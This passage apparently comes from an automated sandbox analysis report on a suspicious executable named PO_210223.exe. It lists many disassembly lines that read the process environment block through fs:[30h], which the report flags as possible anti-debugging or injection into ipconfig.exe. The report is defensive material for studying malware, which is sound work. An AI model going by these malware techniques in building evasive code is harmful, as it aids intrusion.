            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0183002D mov eax, dword ptr fs:[00000030h] (reported 5 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_01820050 mov eax, dword ptr fs:[00000030h] (reported 2 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_018D1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_018C2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_018C138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_018BD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_01811B8F mov eax, dword ptr fs:[00000030h] (reported 2 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0183B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_01832397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_018D5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_01834BAD mov eax, dword ptr fs:[00000030h] (reported 3 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_018853CA mov eax, dword ptr fs:[00000030h] (reported 2 times)
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01833B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01833B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01818A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01805210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01805210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01805210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01805210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01823A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01844A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01844A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01809240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01809240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01809240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01809240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CEA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01894257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018BB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018BB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0184927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01832581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01802D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018335A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01831DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01831DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01831DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018B8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01813D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01834D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01834D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01834D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0188A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01843D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01883540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01827D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01886C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01818794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01887794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01887794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01887794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018437F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01804F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01804F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0189FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018846A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01848EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018BFEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018336CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018D8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018316E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018176E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01838E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018C1608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0183A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0180E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018BFE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_01817E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_018CAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0181766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 9_2_0182AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03528B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0345DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0346FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03483B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03483B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03528F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0351131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034EFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034EFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0352070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0352070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03454F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03454F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0347DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034937F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03461B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03461B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0350D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03468794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0348B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_034D7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_0351138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03482397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03484BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03484BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03484BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03525BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03459240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03459240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03459240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03459240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 13_2_03467E41 mov eax, dword ptr fs:[00000030h]
